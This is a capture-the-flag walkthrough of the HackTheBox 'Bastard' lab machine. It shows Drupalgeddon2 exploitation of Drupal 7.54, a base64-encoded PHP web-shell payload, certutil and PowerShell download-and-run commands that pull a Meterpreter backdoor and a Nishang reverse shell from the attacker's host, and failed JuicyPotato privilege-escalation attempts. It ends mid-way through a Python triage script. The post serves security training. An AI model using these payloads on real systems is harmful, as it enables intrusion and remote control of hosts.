This post is a walkthrough of the HackTheBox machine Bastard.
Hackthebox Bastard Walkthrough

Port Scan
Nmap
nmap -sT -p- --min-rate 10000 -Pn -oN alltcp.txt 10.10.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:01 EST
Nmap scan report for 10.10.10.9
Host is up (0.057s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 16.46 seconds
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ sudo nmap -sU -p- --min-rate 10000 -Pn -oN alludp.txt 10.10.10.9
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:01 EST
Nmap scan report for 10.10.10.9
Host is up.
All 65535 scanned ports on 10.10.10.9 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds
sudo nmap -p 80,135,49154 -Pn -sC -sV -oN detailed.txt 10.10.10.9
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:23 EST
Nmap scan report for 10.10.10.9
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.04 seconds
$ sudo nmap -p80 --script vuln 10.10.10.9
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-19 19:32 EST
Stats: 0:10:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.12% done; ETC: 19:43 (0:00:06 remaining)
Nmap scan report for 10.10.10.9
Host is up (0.053s latency).
PORT STATE SERVICE
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.9:80/
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://10.10.10.9:80/user/register
| Form id: user-register-form
| Form action: /user/register
|
| Path: http://10.10.10.9:80/node?destination=node
| Form id: user-login-form
| Form action: /node?destination=node
|
| Path: http://10.10.10.9:80/user
| Form id: user-login
| Form action: /user
|
| Path: http://10.10.10.9:80/user/
| Form id: user-login
|_ Form action: /user/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 1020.11 seconds
Directory Enumeration
gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/19 19:42:47 Starting gobuster in directory enumeration mode
===============================================================
/.cvsignore (Status: 403) [Size: 1233]
/.bash_history (Status: 403) [Size: 1233]
/.cache (Status: 403) [Size: 1233]
/.hta (Status: 403) [Size: 1233]
/.git/HEAD (Status: 403) [Size: 1233]
/.cvs (Status: 403) [Size: 1233]
/.bashrc (Status: 403) [Size: 1233]
/.forward (Status: 403) [Size: 1233]
/.history (Status: 403) [Size: 1233]
/.listings (Status: 403) [Size: 1233]
/.mysql_history (Status: 403) [Size: 1233]
/.htaccess (Status: 403) [Size: 1233]
/.listing (Status: 403) [Size: 1233]
/.profile (Status: 403) [Size: 1233]
/.perf (Status: 403) [Size: 1233]
/.rhosts (Status: 403) [Size: 1233]
/.passwd (Status: 403) [Size: 1233]
/.htpasswd (Status: 403) [Size: 1233]
/.ssh (Status: 403) [Size: 1233]
/.sh_history (Status: 403) [Size: 1233]
/.swf (Status: 403) [Size: 1233]
/.subversion (Status: 403) [Size: 1233]
/.svn (Status: 403) [Size: 1233]
/.svn/entries (Status: 403) [Size: 1233]
/.web (Status: 403) [Size: 1233]
/0 (Status: 200) [Size: 7583]
/admin (Status: 403) [Size: 1233]
/Admin (Status: 403) [Size: 1233]
/ADMIN (Status: 403) [Size: 1233]
Progress: 600 / 4615 (13.00%) [ERROR
Getting an initial shell
We know this is a Drupal installation (nmap's http-generator line reports "Drupal 7"), but not the exact release. droopescan, run below, identifies it as 7.54. Drupal 7.x before 7.58 is vulnerable to Drupalgeddon2 (CVE-2018-7600, SA-CORE-2018-002), an unauthenticated remote code execution bug in the Form API; searchsploit lists it as "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution". The searchsploit output is shown below; the exploit I actually ran is the standalone Ruby script from dreadlocked/Drupalgeddon2 (cloned further down), which implements the same CVE-2018-7600 technique as the Metasploit module.
python3 droopescan scan drupal -u http://10.10.10.9 -t 32
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
image http://10.10.10.9/modules/image/
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Scan finished (0:53:57.469302 elapsed)
searchsploit drupal 7.5
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
-----------------------------------------------------------------------------------
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ cd /opt
┌──(rocky㉿kali)-[/opt]
└─$ sudo git clone https://github.com/dreadlocked/Drupalgeddon2.git
[sudo] password for rocky:
Cloning into 'Drupalgeddon2'...
remote: Enumerating objects: 257, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 257 (delta 0), reused 0 (delta 0), pack-reused 253
Receiving objects: 100% (257/257), 102.12 KiB | 497.00 KiB/s, done.
Resolving deltas: 100% (88/88), done.
┌──(rocky㉿kali)-[/opt]
└─$ cd Drupalgeddon2
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ ls
drupalgeddon2-customizable-beta.rb drupalgeddon2.rb README.md
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ sudo chmod +x drupalgeddon2.rb
┌──(rocky㉿kali)-[/opt/Drupalgeddon2]
└─$ ./drupalgeddon2.rb http://10.10.10.9
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ISDNMAFU
[+] Result : ISDNMAFU
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.9/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php)
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> ls
drupalgeddon2>> whoami
nt authority\iusr
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
19/03/2017 08:04 <DIR> .
19/03/2017 08:04 <DIR> ..
19/03/2017 12:42 317 .editorconfig
19/03/2017 12:42 174 .gitignore
19/03/2017 12:42 5.969 .htaccess
19/03/2017 12:42 6.604 authorize.php
19/03/2017 12:42 110.781 CHANGELOG.txt
19/03/2017 12:42 1.481 COPYRIGHT.txt
19/03/2017 12:42 720 cron.php
19/03/2017 12:43 <DIR> includes
19/03/2017 12:42 529 index.php
19/03/2017 12:42 1.717 INSTALL.mysql.txt
19/03/2017 12:42 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 703 install.php
19/03/2017 12:42 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 17.995 INSTALL.txt
19/03/2017 12:42 18.092 LICENSE.txt
19/03/2017 12:42 8.710 MAINTAINERS.txt
19/03/2017 12:43 <DIR> misc
19/03/2017 12:43 <DIR> modules
19/03/2017 12:43 <DIR> profiles
19/03/2017 12:42 5.382 README.txt
19/03/2017 12:42 2.189 robots.txt
19/03/2017 12:43 <DIR> scripts
19/03/2017 12:43 <DIR> sites
19/03/2017 12:43 <DIR> themes
19/03/2017 12:42 19.986 update.php
19/03/2017 12:42 10.123 UPGRADE.txt
19/03/2017 12:42 2.200 web.config
19/03/2017 12:42 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 4.137.070.592 bytes free
We now have command execution as "nt authority\iusr". The drupalgeddon2>> prompt is not a real shell: every command is sent in a fresh HTTP request and runs in a new process, so state such as the working directory does not carry over. Below, cd scripts is accepted without complaint but the next dir still lists C:\inetpub\drupal-7.54, and pwd prints nothing because cmd.exe has no such command. It is not read-only either (the certutil downloads later land in the web root); it just cannot be navigated interactively.
drupalgeddon2>> cd scripts
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
19/03/2017 08:04 <DIR> .
19/03/2017 08:04 <DIR> ..
19/03/2017 12:42 317 .editorconfig
19/03/2017 12:42 174 .gitignore
19/03/2017 12:42 5.969 .htaccess
19/03/2017 12:42 6.604 authorize.php
19/03/2017 12:42 110.781 CHANGELOG.txt
19/03/2017 12:42 1.481 COPYRIGHT.txt
19/03/2017 12:42 720 cron.php
19/03/2017 12:43 <DIR> includes
19/03/2017 12:42 529 index.php
19/03/2017 12:42 1.717 INSTALL.mysql.txt
19/03/2017 12:42 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 703 install.php
19/03/2017 12:42 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 17.995 INSTALL.txt
19/03/2017 12:42 18.092 LICENSE.txt
19/03/2017 12:42 8.710 MAINTAINERS.txt
19/03/2017 12:43 <DIR> misc
19/03/2017 12:43 <DIR> modules
19/03/2017 12:43 <DIR> profiles
19/03/2017 12:42 5.382 README.txt
19/03/2017 12:42 2.189 robots.txt
19/03/2017 12:43 <DIR> scripts
19/03/2017 12:43 <DIR> sites
19/03/2017 12:43 <DIR> themes
19/03/2017 12:42 19.986 update.php
19/03/2017 12:42 10.123 UPGRADE.txt
19/03/2017 12:42 2.200 web.config
19/03/2017 12:42 417 xmlrpc.php
21 File(s) 217.261 bytes
9 Dir(s) 4.137.070.592 bytes free
drupalgeddon2>> pwd
drupalgeddon2>> systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 19/2/2022, 4:35:21
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.528 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.539 MB
Virtual Memory: In Use: 556 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
drupalgeddon2>> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeImpersonatePrivilege on an IIS identity is the classic precondition for the Potato family: a COM server running as SYSTEM is coerced into authenticating to a local listener and the resulting token is impersonated to spawn a process. I tried to abuse it with JuicyPotato, using the x86 build from https://github.com/ivanitlearning/Juicy-Potato-x86 (the target is x64; an x86 build still runs under WOW64, but the x64 release would be the natural fit). I served the binary over HTTP from my attacking host and pulled it down with certutil:
drupalgeddon2>> certutil -urlcache -split -f "http://10.10.14.12:8000/Juicy.Potato.x86.exe" "Juicy.exe"
**** Online ****
000000 ...
040600
CertUtil: -URLCache command completed successfully.
drupalgeddon2>> dir
Volume in drive C has no label.
Volume Serial Number is C4CD-C60B
Directory of C:\inetpub\drupal-7.54
┌──(rocky㉿kali)-[~/hckbox/Bastard]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=5555 --arch x64 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
drupalgeddon2>> certutil -urlcache -split -f "http://10.10.14.12:8000/backdoor.exe" "backdoor.exe"
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
Directory of C:\inetpub\drupal-7.54
20/02/2022 04:02 <DIR> .
20/02/2022 04:02 <DIR> ..
19/03/2017 12:42 317 .editorconfig
19/03/2017 12:42 174 .gitignore
19/03/2017 12:42 5.969 .htaccess
19/03/2017 12:42 6.604 authorize.php
20/02/2022 04:02 7.168 backdoor.exe
19/03/2017 12:42 110.781 CHANGELOG.txt
19/03/2017 12:42 1.481 COPYRIGHT.txt
19/03/2017 12:42 720 cron.php
19/03/2017 12:43 <DIR> includes
19/03/2017 12:42 529 index.php
19/03/2017 12:42 1.717 INSTALL.mysql.txt
19/03/2017 12:42 1.874 INSTALL.pgsql.txt
19/03/2017 12:42 703 install.php
19/03/2017 12:42 1.298 INSTALL.sqlite.txt
19/03/2017 12:42 17.995 INSTALL.txt
20/02/2022 03:59 263.680 Juicy.exe
19/03/2017 12:42 18.092 LICENSE.txt
19/03/2017 12:42 8.710 MAINTAINERS.txt
19/03/2017 12:43 <DIR> misc
19/03/2017 12:43 <DIR> modules
19/03/2017 12:43 <DIR> profiles
19/03/2017 12:42 5.382 README.txt
19/03/2017 12:42 2.189 robots.txt
19/03/2017 12:43 <DIR> scripts
19/03/2017 12:43 <DIR> sites
20/02/2022 03:59 <DIR> temp
19/03/2017 12:43 <DIR> themes
19/03/2017 12:42 19.986 update.php
19/03/2017 12:42 10.123 UPGRADE.txt
19/03/2017 12:42 2.200 web.config
19/03/2017 12:42 417 xmlrpc.php
23 File(s) 488.109 bytes
10 Dir(s) 4.124.024.832 bytes free
Privileged shell
Let's run the JuicyPotato exploit to get a privileged shell, with the Meterpreter payload as the process to launch and a local listening port for the COM callback. It did not work:
drupalgeddon2>> Juicy.exe -t * -p backdoor.exe -l 8003
Testing {4991D34B-80A1-4291-B697-000000000000} 8003
COM -> recv failed with error: 10038
drupalgeddon2>>
drupalgeddon2>> Juicy.exe -t * -p backdoor.exe -l 8006
Testing {4991D34B-80A1-4291-B697-000000000000} 8006
COM -> recv failed with error: 10038
drupalgeddon2>>
It may be a limitation of the Drupalgeddon2 command channel, where each command runs in a short-lived process under a web request. Let's move the same user into a proper reverse shell (a PowerShell one-liner that loads Nishang's Invoke-PowerShellTcp from my host, judging by the error text further down) and, while we are at it, find a CLSID that is actually valid for this host.
drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.12:8000/shell.ps1')
$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.9] 60413
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
PS C:\inetpub\drupal-7.54> pwd
Path
----
C:\inetpub\drupal-7.54
PS C:\inetpub\drupal-7.54> cd :\\
PS C:\inetpub\drupal-7.54> Set-Location : Cannot find path 'C:\inetpub\drupal-7.54\:\' because it does not
exist.
At line:1 char:3
+ cd <<<< :\\
+ CategoryInfo : ObjectNotFound: (C:\inetpub\drupal-7.54\:\:Strin
g) [Set-Location], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLo
cationCommand
cd c:\
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 19/3/2017 12:43 inetpub
d---- 19/3/2017 1:28 oracle
d---- 14/7/2009 6:20 P
Finding a CLSID. JuicyPotato needs the CLSID of a COM server that is present on this OS and runs as SYSTEM. The upstream repository (ohpe/juicy-potato, CLSID directory) ships GetCLSID.ps1, test_clsid.bat and a CLSID list per Windows version; I downloaded those three files through the PowerShell session we now have.
I used the Windows 2012 Datacenter CLSID list, then ran the batch file and picked a CLSID whose test result was NT AUTHORITY\SYSTEM. (The full result list is not reproduced in this post.) One caveat a reader should apply: CLSIDs are specific to the OS version, and this box is Windows Server 2008 R2, so the 2008 R2 list is the one to test from.
Let's run the exploit once again with the new CLSID.
It did not work either. Two things are visible in the attempts below. First, the tool still prints "Testing {4991d34b-80a1-4291-83b6-3328366b9097}", which is JuicyPotato's built-in default (the BITS CLSID), so the -c value never reached it; pass the CLSID as a separate, quoted argument (-c "{BA126AD6-2166-11D1-B1D0-00805FC1270E}") and confirm the Testing line echoes it. Second, the later invocation as plain juicypotato.exe is not found because PowerShell does not search the current directory for executables; it needs .\juicypotato.exe. I moved on to a different method.
PS C:\temp> ./juicypotato.exe -l 8003 -p C:\temp\backdoor.exe -t* -c{BA126AD6-2166-11D1-B1D0-00805FC1270E}
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 8003
COM -> recv failed with error: 10038
PS C:\temp> cmd.exe
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>
PS C:\temp> juicypotato.exe -l 8003 -p C:\temp\backdoor.exe -t* -c{BA126AD6-2166-11D1-B1D0-00805FC1270E}
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>
PS C:\temp> Invoke-PowerShellTcp : The term 'juicypotato.exe' is not recognized as the name
of a cmdlet, function, script file, or operable program. Check the spelling of
the name, or if a path was included, verify that the path is correct and try a
gain.
At line:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.12 -Port 4444
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
tion
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
n,Invoke-PowerShellTcp
I then ran Windows Exploit Suggester (the python3 port at https://github.com/Pwnistry/Windows-Exploit-Suggester-python3), which compares the target's patch level taken from systeminfo against Microsoft's bulletin database and flags missing patches that have public exploits or Metasploit modules:
sudo git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3.git
Cloning into 'Windows-Exploit-Suggester-python3'...
remote: Enumerating objects: 123, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 123 (delta 0), reused 1 (delta 0), pack-reused 120
Receiving objects: 100% (123/123), 188.32 KiB | 918.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
┌──(rocky㉿kali)-[/opt]
└─$ cd Windows-Exploit-Suggester-python3
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --update
[*]
initiating winsploit version 3.4...
[+]
writing to file 2022-02-20-mssb.xlsx
[*]
done
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo cp ~/hckbox/Bastard/systeminfo-bastard .
┌──(rocky㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --database 2022-02-20-mssb.xlsx --systeminfo systeminfo-bastard
[*]
The exploit suggester did not give me anything useful either (its output above is cut off). I then tried another privilege-escalation tool, Sherlock (rasta-mouse's PowerShell script), loaded straight into the reverse shell and run with Find-AllVulns:
PS C:\temp> IEX(new-object Net.WebClient).DownloadString("http://10.10.14.12:8000/Sherlock.ps1");Find-AllVulns
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
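Sherlock and Windows Exploit Suggester both boil down to the same triage: which flagged bulletins are plausible on this build and architecture, and whose fixing KB is absent from systeminfo. The added Python example below (my code, not Sherlock's or WES's, and not part of the original post) parses both outputs and applies that filter. The systeminfo and Sherlock samples are constructed excerpts of the output shown on this page, the MS15-051 to KB3045171 mapping is taken from the name of the zip used in the next step, and KBs for any other bulletin are left for the reader to add from the Microsoft bulletin pages.

```python
"""Triage kernel-EoP candidates from `systeminfo` and Sherlock's Find-AllVulns output.
Added example for this walkthrough; not Sherlock or Windows-Exploit-Suggester code."""
import re

# Fixing KB per bulletin. Only MS15-051 -> KB3045171 is taken from this post (zip name).
FIX_KB = {"MS15-051": "KB3045171"}

KEY_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()/\-]*?):\s*(.*)$")
ITEM_LINE = re.compile(r"^\s*\[\d+\]:\s*(\S+)")


def parse_systeminfo(text):
    """Key/value lines become dict entries; '[01]: KBnnn' lines under Hotfix(s) are
    collected into info['hotfixes'] (empty when systeminfo reports N/A)."""
    info, key = {"hotfixes": []}, None
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1).strip()
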